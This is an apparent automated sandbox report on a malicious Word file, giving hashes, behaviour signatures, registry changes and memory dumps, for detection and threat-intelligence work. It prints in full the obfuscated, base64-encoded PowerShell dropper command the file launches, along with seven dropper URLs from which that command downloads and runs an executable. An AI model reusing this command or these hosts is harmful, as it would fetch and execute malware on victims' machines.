b8c7830a4a2390d6b31f40d0dd0958d1ee0844ac3dc20484bd00a9bc6ca87be7

Analysis

max time kernel
148s
max time network
150s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
19-09-2024 14:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

eb7eac4bc393d5b1c406c52ba0dda1eb_JaffaCakes118.doc
Size

170KB
MD5

eb7eac4bc393d5b1c406c52ba0dda1eb
SHA1

ca4f54ce2136b9ac15c80ec18a10362e6f069795
SHA256

b8c7830a4a2390d6b31f40d0dd0958d1ee0844ac3dc20484bd00a9bc6ca87be7
SHA512

fd3862de3a28e652b6ac5e591a56755c12e04953ca8578d365a4c709abc8f979a9eeb6c4a79fdb2a704a0c74069961650b3b7997736cbbaacbb6bc4f49f2999e
SSDEEP

3072:R9ufstRUUKSns8T00JSHUgteMJ8qMD7gZYFESXiNBaZxPIp:R9ufsfgIf0pLWFESXiNIZxQp

Score

10^/10

discovery

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://shop.qihchina.com/validators/8/

exe.dropper

http://skoolkam.com/blog/5ji/

exe.dropper

http://shopmebom.webdungsan.com/wp-admin/1Oy/

exe.dropper

http://demo77.webdungsan.com/wp-admin/6m/

exe.dropper

https://wyyichen.com/wp-includes/W0N/

exe.dropper

http://94.24.72.63/wp-content/te/

exe.dropper

http://topupez.info/wp-includes/DEr/

Signatures

Blocklisted process makes network request 12 IoCs

flow	pid	Process
5	2892	POwersheLL.exe
6	2892	POwersheLL.exe
7	2892	POwersheLL.exe
10	2892	POwersheLL.exe
13	2892	POwersheLL.exe
15	2892	POwersheLL.exe
17	2892	POwersheLL.exe
19	2892	POwersheLL.exe
21	2892	POwersheLL.exe
22	2892	POwersheLL.exe
23	2892	POwersheLL.exe
24	2892	POwersheLL.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WINWORD.EXE

Office loads VBA resources, possible macro or embedded object present

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcToggleButton"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents5"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}\ = "SpinbuttonEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}\ = "MultiPageEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}\ = "ControlEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}\ = "OptionFrameEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents3"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}\ = "ICommandButton"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{0EED76BA-B9BB-4283-94AF-AF735FCD0129}\2.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE\\MSForms.exd"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLReset"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\TypeLib\{0EED76BA-B9BB-4283-94AF-AF735FCD0129}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}\ = "Pages"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLCheckbox"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcText"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcToggleButton"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}\ = "SpinbuttonEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents10"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}\ = "CommandButtonEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}\ = "MdcTextEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}\ = "ICommandButton"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCheckBox"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents1"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents6"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}\ = "IReturnString"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLPassword"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\TypeLib\{0EED76BA-B9BB-4283-94AF-AF735FCD0129}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\TypeLib\{0EED76BA-B9BB-4283-94AF-AF735FCD0129}\2.0\FLAGS	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2696	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2892	POwersheLL.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2892	POwersheLL.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2696	WINWORD.EXE
2696	WINWORD.EXE

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 2696 wrote to memory of 1700	2696	WINWORD.EXE	34
PID 2696 wrote to memory of 1700	2696	WINWORD.EXE	34
PID 2696 wrote to memory of 1700	2696	WINWORD.EXE	34
PID 2696 wrote to memory of 1700	2696	WINWORD.EXE	34

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\eb7eac4bc393d5b1c406c52ba0dda1eb_JaffaCakes118.doc"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2696
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:1700

C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
POwersheLL -ENCOD JABRAHYAMABsAG4ANAA1AD0AKAAnAFEAOQAnACsAKAAnAHkAagA4ACcAKwAnAG0AOQAnACkAKQA7ACYAKAAnAG4AZQB3AC0AJwArACcAaQAnACsAJwB0AGUAbQAnACkAIAAkAEUAbgB2ADoAVQBzAGUAUgBwAHIATwBmAGkATABlAFwARAA1AFUAMABoAEYAMwBcAGwAdABWAEsATwBNAGUAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABpAHIAZQBjAHQAbwByAFkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMARQBjAGAAVQBSAGkAVABZAFAAUgBgAE8AYABUAGAATwBDAG8ATAAiACAAPQAgACgAKAAnAHQAJwArACcAbABzADEAJwApACsAJwAyACwAJwArACgAJwAgAHQAbAAnACsAJwBzADEAJwApACsAJwAxACwAJwArACgAJwAgAHQAbAAnACsAJwBzACcAKQApADsAJABFAHEAbABpAGQAXwByACAAPQAgACgAKAAnAFcAeQAnACsAJwBsACcAKQArACgAJwBpAHgAJwArACcAdgA1ACcAKQArACcAagAzACcAKQA7ACQAUQAyAGYANQB0ADYAbAA9ACgAJwBPACcAKwAoACcAcwAnACsAJwBiAGcAJwApACsAKAAnAHQAbQAnACsAJwBfACcAKQApADsAJABLAHUANQBkAGoAMQBkAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACgAKAAnAHsAJwArACcAMAB9AEQAJwArACcANQB1ADAAaABmADMAewAwAH0ATAB0AHYAawBvAG0AZQB7ACcAKwAnADAAfQAnACkALQBmACAAIABbAEMAaABBAFIAXQA5ADIAKQArACQARQBxAGwAaQBkAF8AcgArACgAJwAuAGUAJwArACcAeABlACcAKQA7ACQASQBqAHMAcwA1AGQAdgA9ACgAJwBLACcAKwAnADEAJwArACgAJwBhADcAYQAnACsAJwBjADIAJwApACkAOwAkAFYAZwB3AG4ANgBoADgAPQAmACgAJwBuAGUAJwArACcAdwAtACcAKwAnAG8AYgBqAGUAYwB0ACcAKQAgAE4ARQBUAC4AdwBFAEIAQwBsAGkAZQBOAHQAOwAkAE4AMQA2ADUAMQBoAHUAPQAoACcAaAAnACsAJwB0ACcAKwAnAHQAcAAnACsAKAAnADoALwAvACcAKwAnAHMAaAAnACsAJwBvAHAALgBxAGkAJwApACsAKAAnAGgAYwBoAGkAbgBhACcAKwAnAC4AJwArACcAYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC8AdgBhAGwAaQBkAGEAJwApACsAJwB0ACcAKwAoACcAbwAnACsAJwByAHMALwAnACkAKwAoACcAOAAvACoAJwArACcAaAAnACkAKwAoACcAdAAnACsAJwB0AHAAJwArACcAOgAvAC8AcwBrAG8AJwArACcAbwBsAGsAYQBtACcAKQArACcALgBjACcAKwAoACcAbwAnACsAJwBtAC8AJwArACcAYgBsAG8AJwArACcAZwAvADUAagAnACkAKwAoACcAaQAvACoAaAAnACsAJwB0AHQAcAAnACsAJwA6AC8ALwAnACsAJwBzACcAKQArACgAJwBoACcAKwAnAG8AcAAnACkAKwAoACcAbQAnACsAJwBlAGIAbwBtACcAKQArACcALgB3ACcAKwAoACcAZQBiAGQAdQAnACsAJwBuACcAKwAnAGcAcwAnACkAKwAoACcAYQAnACsAJwBuAC4AYwBvACcAKQArACgAJwBtAC8AdwAnACsAJwBwAC0AYQAnACsAJwBkAG0AJwApACsAKAAnAGkAJwArACcAbgAvACcAKQArACgAJwAxAE8AeQAvACoAJwArACcAaAAnACsAJwB0ACcAKwAnAHQAcAA6AC8ALwAnACkAKwAoACcAZABlAG0AJwArACcAbwAnACkAKwAnADcAJwArACcANwAuACcAKwAnAHcAJwArACcAZQAnACsAJwBiACcAKwAoACcAZAAnACsAJwB1AG4AZwAnACkAKwAnAHMAYQAnACsAJwBuACcAKwAoACcALgBjACcAKwAnAG8AbQAnACsAJwAvAHcAJwApACsAJwBwACcAKwAnAC0AJwArACgAJwBhAGQAbQAnACsAJwBpAG4ALwA2ACcAKQArACgAJwBtAC8AJwArACcAKgAnACsAJwBoAHQAdABwAHMAJwArACcAOgAvAC8AdwB5AHkAaQBjAGgAZQAnACsAJwBuAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwBwACcAKwAnAC0AaQBuAGMAJwArACcAbAAnACkAKwAoACcAdQBkAGUAcwAvAFcAMABOAC8AJwArACcAKgBoACcAKwAnAHQAJwApACsAKAAnAHQAcAA6AC8AJwArACcALwA5ACcAKQArACgAJwA0ACcAKwAnAC4AMgAnACkAKwAoACcANAAnACsAJwAuACcAKwAnADcAMgAuADYAMwAvACcAKQArACgAJwB3ACcAKwAnAHAALQAnACsAJwBjAG8AbgB0AGUAJwApACsAKAAnAG4AdAAvACcAKwAnAHQAZQAnACkAKwAoACcALwAqAGgAJwArACcAdAAnACkAKwAoACcAdABwADoAJwArACcALwAvAHQAbwAnACsAJwBwAHUAcABlAHoAJwApACsAKAAnAC4AaQAnACsAJwBuAGYAbwAnACkAKwAoACcALwAnACsAJwB3AHAALQBpAG4AJwArACcAYwBsAHUAJwApACsAJwBkACcAKwAnAGUAcwAnACsAJwAvACcAKwAoACcARAAnACsAJwBFAHIALwAnACkAKQAuACIAUwBQAGAAbABJAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABOAGsAZgBkAHkANABwAD0AKAAnAFkAaQAnACsAJwAzAHAAJwArACgAJwA2AHoAJwArACcAZgAnACkAKQA7AGYAbwByAGUAYQBjAGgAKAAkAFgAbgB2AHEAYwBnAHQAIABpAG4AIAAkAE4AMQA2ADUAMQBoAHUAKQB7AHQAcgB5AHsAJABWAGcAdwBuADYAaAA4AC4AIgBkAGAATwB3AG4AYABsAE8AYQBEAGAARgBJAEwAZQAiACgAJABYAG4AdgBxAGMAZwB0ACwAIAAkAEsAdQA1AGQAagAxAGQAKQA7ACQARwA3AGoAdgAzAGoAawA9ACgAKAAnAEUAJwArACcAcQBwACcAKQArACgAJwA0ACcAKwAnADUAcQB4ACcAKQApADsASQBmACAAKAAoAC4AKAAnAEcAZQB0ACcAKwAnAC0ASQAnACsAJwB0AGUAbQAnACkAIAAkAEsAdQA1AGQAagAxAGQAKQAuACIATABgAEUATgBHAHQASAAiACAALQBnAGUAIAAzADAAMgA1ADcAKQAgAHsALgAoACcASQBuAHYAbwBrAGUAJwArACcALQBJAHQAZQAnACsAJwBtACcAKQAoACQASwB1ADUAZABqADEAZAApADsAJABJAHkAagBoADgAZAB0AD0AKAAoACcAUgB1AHYAbQAnACsAJwBmACcAKQArACcANQB6ACcAKQA7AGIAcgBlAGEAawA7ACQAQgB4AGYANABnADkAagA9ACgAKAAnAFAAJwArACcAOAAnACsAJwBoAG8AdwBfACcAKQArACcAcwAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEcAeQB0AGIAOAAzAG0APQAoACcAUwAyACcAKwAnAGQAMQAnACsAKAAnAHoAJwArACcAaQBhACcAKQApAA==
1⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2892

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

Filesize
19KB

MD5
bfb6351b300d3f3cd0752d51f8bc6f98

SHA1
0bc6c9f43ef5b4658c074fa3c8e4e488d8ad948d

SHA256
e9fab617b7b11f75790f7addbade4926aea1cc09aa6c9ef3d08e60178e0ed98d

SHA512
ffa7ed499a8b4fd131909651256829fed04d1857e6fa1406fd95c8b80ded0115739c23336586ea36abf208011df292efb754320b72ec94ff65113969a9ca866d

Download Submit
memory/2696-47-0x0000000005AE0000-0x0000000005BE0000-memory.dmp

Filesize
1024KB

Download
memory/2696-82-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2696-5-0x0000000000610000-0x0000000000710000-memory.dmp

Filesize
1024KB

Download
memory/2696-83-0x000000007152D000-0x0000000071538000-memory.dmp

Filesize
44KB

Download
memory/2696-28-0x0000000005AE0000-0x0000000005BE0000-memory.dmp

Filesize
1024KB

Download
memory/2696-27-0x0000000000610000-0x0000000000710000-memory.dmp

Filesize
1024KB

Download
memory/2696-20-0x0000000000610000-0x0000000000710000-memory.dmp

Filesize
1024KB

Download
memory/2696-18-0x0000000000610000-0x0000000000710000-memory.dmp

Filesize
1024KB

Download
memory/2696-17-0x0000000000610000-0x0000000000710000-memory.dmp

Filesize
1024KB

Download
memory/2696-16-0x0000000000610000-0x0000000000710000-memory.dmp

Filesize
1024KB

Download
memory/2696-15-0x0000000000610000-0x0000000000710000-memory.dmp

Filesize
1024KB

Download
memory/2696-14-0x0000000000610000-0x0000000000710000-memory.dmp

Filesize
1024KB

Download
memory/2696-13-0x0000000000610000-0x0000000000710000-memory.dmp

Filesize
1024KB

Download
memory/2696-12-0x0000000000610000-0x0000000000710000-memory.dmp

Filesize
1024KB

Download
memory/2696-11-0x0000000000610000-0x0000000000710000-memory.dmp

Filesize
1024KB

Download
memory/2696-10-0x0000000000610000-0x0000000000710000-memory.dmp

Filesize
1024KB

Download
memory/2696-9-0x0000000000610000-0x0000000000710000-memory.dmp

Filesize
1024KB

Download
memory/2696-46-0x0000000000610000-0x0000000000710000-memory.dmp

Filesize
1024KB

Download
memory/2696-7-0x0000000005CE0000-0x0000000005DE0000-memory.dmp

Filesize
1024KB

Download
memory/2696-6-0x0000000000610000-0x0000000000710000-memory.dmp

Filesize
1024KB

Download
memory/2696-19-0x0000000000610000-0x0000000000710000-memory.dmp

Filesize
1024KB

Download
memory/2696-0-0x000000002FB31000-0x000000002FB32000-memory.dmp

Filesize
4KB

Download
memory/2696-29-0x0000000000610000-0x0000000000710000-memory.dmp

Filesize
1024KB

Download
memory/2696-2-0x000000007152D000-0x0000000071538000-memory.dmp

Filesize
44KB

Download
memory/2696-8-0x0000000000610000-0x0000000000710000-memory.dmp

Filesize
1024KB

Download
memory/2696-42-0x0000000000610000-0x0000000000710000-memory.dmp

Filesize
1024KB

Download
memory/2696-41-0x0000000000610000-0x0000000000710000-memory.dmp

Filesize
1024KB

Download
memory/2696-40-0x0000000000610000-0x0000000000710000-memory.dmp

Filesize
1024KB

Download
memory/2696-39-0x0000000000610000-0x0000000000710000-memory.dmp

Filesize
1024KB

Download
memory/2696-38-0x0000000005AE0000-0x0000000005BE0000-memory.dmp

Filesize
1024KB

Download
memory/2696-37-0x0000000000610000-0x0000000000710000-memory.dmp

Filesize
1024KB

Download
memory/2696-33-0x0000000000610000-0x0000000000710000-memory.dmp

Filesize
1024KB

Download
memory/2696-32-0x0000000000610000-0x0000000000710000-memory.dmp

Filesize
1024KB

Download
memory/2696-31-0x0000000000610000-0x0000000000710000-memory.dmp

Filesize
1024KB

Download
memory/2696-30-0x0000000000610000-0x0000000000710000-memory.dmp

Filesize
1024KB

Download
memory/2696-59-0x000000007152D000-0x0000000071538000-memory.dmp

Filesize
44KB

Download
memory/2696-60-0x0000000000610000-0x0000000000710000-memory.dmp

Filesize
1024KB

Download
memory/2696-61-0x0000000005AE0000-0x0000000005BE0000-memory.dmp

Filesize
1024KB

Download
memory/2696-62-0x0000000000610000-0x0000000000710000-memory.dmp

Filesize
1024KB

Download
memory/2696-63-0x0000000005AE0000-0x0000000005BE0000-memory.dmp

Filesize
1024KB

Download
memory/2696-64-0x0000000000610000-0x0000000000710000-memory.dmp

Filesize
1024KB

Download
memory/2696-65-0x0000000005AE0000-0x0000000005BE0000-memory.dmp

Filesize
1024KB

Download
memory/2696-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2892-54-0x0000000001DE0000-0x0000000001DE8000-memory.dmp

Filesize
32KB

Download
memory/2892-53-0x000000001B7F0000-0x000000001BAD2000-memory.dmp

Filesize
2.9MB

Download